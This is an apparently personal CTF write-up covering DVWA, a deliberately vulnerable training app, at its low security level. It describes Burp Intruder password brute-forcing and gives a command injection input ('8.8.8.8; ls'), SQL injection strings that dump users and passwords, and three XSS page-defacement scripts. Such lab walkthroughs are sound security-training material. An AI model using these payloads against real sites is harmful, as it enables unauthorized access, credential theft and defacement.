ctf_aria

write up ctf by ariafatah

Project maintained by ariafatah0711 Hosted on GitHub Pages — Theme by mattgraham

DVWA - Damn Vulnerable Web Application

URL: https://dvwa.al3xzer0.cfd/login.php Writeup Referensi: infosecwriteups.com Credentials:

Username: admin  
Password: password

Security Level: Low

🔧 Tools: Burp Suite

Capture request login menggunakan Burp Proxy.
Kirim ke Intruder.
Gunakan tipe Cluster Bomb.
Payload 1: isikan username (admin), Payload 2: list password.
Gunakan fitur Grep - Match, tambahkan teks yang muncul saat login berhasil (misal: Welcome to the password protected area).
Jalankan Start Attack (Simple).

🢨 Command Injection

Contoh Input:

8.8.8.8
8.8.8.8; ls

Keterangan: Perintah kedua akan melakukan injection dan menjalankan ls setelah ping ke 8.8.8.8.

💞 SQL Injection

Basic SQL Injection:

' OR 1 = 1 #

Advanced (Union-based) SQL Injection:

' UNION SELECT user, password FROM users #

xss

<script>   document.body.innerHTML = `     <div style="height:100vh;background:black;color:lime;display:flex;justify-content:center;align-items:center;flex-direction:column;">       <h1 style="font-size:3em;">Hacked by muzaki</h1>       <p style="font-size:1.5em;">This page was defaced using XSS</p>     </div>   `; </script>

<script>
  const defaceDiv = document.createElement("div");
  defaceDiv.style = "height:100vh;background:black;color:lime;display:flex;justify-content:center;align-items:center;flex-direction:column;margin-top:20px;";
  defaceDiv.innerHTML = `
    <h1 style="font-size:3em;">Hacked by muzaki</h1>
    <p style="font-size:1.5em;">This page was defaced using XSS</p>
  `;
  document.body.appendChild(defaceDiv);
</script>

<script>
document.body.innerHTML+=`<div style="height:100vh;background:black;color:lime;display:flex;justify-content:center;align-items:center;flex-direction:column;margin-top:20px;"><h1>Hacked by muzaki</h1><p>This page was defaced</p></div>`;
</script>

open redirect

crypto

Your new password is: Olifant